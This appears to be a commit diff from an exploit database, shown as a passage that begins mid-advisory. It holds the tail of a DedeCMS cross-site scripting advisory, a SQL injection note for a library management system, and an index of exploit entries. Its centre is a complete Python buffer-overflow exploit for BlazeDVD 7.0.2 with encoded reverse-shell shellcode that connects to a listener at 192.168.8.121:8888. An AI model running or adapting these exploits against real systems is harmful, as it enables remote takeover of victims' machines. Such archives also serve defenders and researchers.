https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/include/dialog/select_media.php
Solution - Fix & Patch:
=======================
1. Parse the content to disallow html / js and special chars on the
affected input fields
2. Restrict the vulnerable paramter prevent injects via post method request
3. Secure the output location were the content is insecure sanitized
delivered as output
Security Risk:
==============
The security risk of the application-side persistent cross site
scripting web vulnerabilities in the different modules are estimated as
medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--

34
exploits/php/webapps/48328.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Google Dork: "LMS v3.0 - Xerone IT "
# Date: 2020-04-09
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link:
https://xeroneit.net/portfolio/library-management-system-lms
# Software Demo :https://xeroneit.co/demo/lms/home/login
# Version: v3.0
# Category: webapps
1. Description
scritp has SQLI in books category at this dir
/lms/home/book?category_name=00*SQLI
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '0' GROUP BY
`title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3
SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as
available_book, `book_info`.`number_of_books`, `book_info`.`id`,
`book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as
`size`, `book_info`.`publishing_year`, `book_info`.`publisher`,
`book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`,
`book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`,
`book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'',
category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`,
`author`, `edition` ORDER BY `title` ASC LIMIT 21
Filename: models/Basic.php
Line Number: 284

80
exploits/windows/local/48329.py Executable file
View file

@ -0,0 +1,80 @@
# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0 <Busra Demir>
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86
#!/usr/bin/python
file = "exploit.plf"
offset ="A"*(612-4)
nseh = "\xeb\x1e\x90\x90"
seh = "\x34\x31\x02\x64"
nops = "\x90" * 24
# msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff'
shellcode = ""
shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
shellcode += "\x43\x49\x6f\x68\x55\x41\x41"
buffer = offset + nseh + seh + nops + shellcode
f = open(file,'w')
f.write(buffer)
f.close()

9
files_exploits.csv
View file

@ -11028,6 +11028,7 @@ id,file,description,date,author,type,platform,port
48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows,
48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42561,3 +42562,11 @@ id,file,description,date,author,type,platform,port
48318,exploits/hardware/webapps/48318.txt,"Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution",2020-04-14,Wadeek,webapps,hardware,
48319,exploits/java/webapps/48319.txt,"WSO2 3.1.0 - Persistent Cross-Site Scripting",2020-04-14,"Raki Ben Hamouda",webapps,java,
48320,exploits/java/webapps/48320.py,"Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution",2020-04-14,nu11secur1ty,webapps,java,
48321,exploits/ios/webapps/48321.txt,"AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,ios,
48322,exploits/ios/webapps/48322.txt,"SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,ios,
48323,exploits/php/webapps/48323.txt,"Pinger 1.0 - Remote Code Execution",2020-04-15,"Milad karimi",webapps,php,
48324,exploits/php/webapps/48324.txt,"SeedDMS 5.1.18 - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,php,
48325,exploits/php/webapps/48325.txt,"Macs Framework 1.14f CMS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,php,
48326,exploits/php/webapps/48326.txt,"DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting",2020-04-15,"Vulnerability Research Laboratory",webapps,php,
48327,exploits/ios/webapps/48327.txt,"File Transfer iFamily 2.1 - Directory Traversal",2020-04-15,Vulnerability-Lab,webapps,ios,
48328,exploits/php/webapps/48328.txt,"Xeroneit Library Management System 3.0 - 'category' SQL Injection",2020-04-15,"Sohel Yousef",webapps,php,

Can't render this file because it is too large.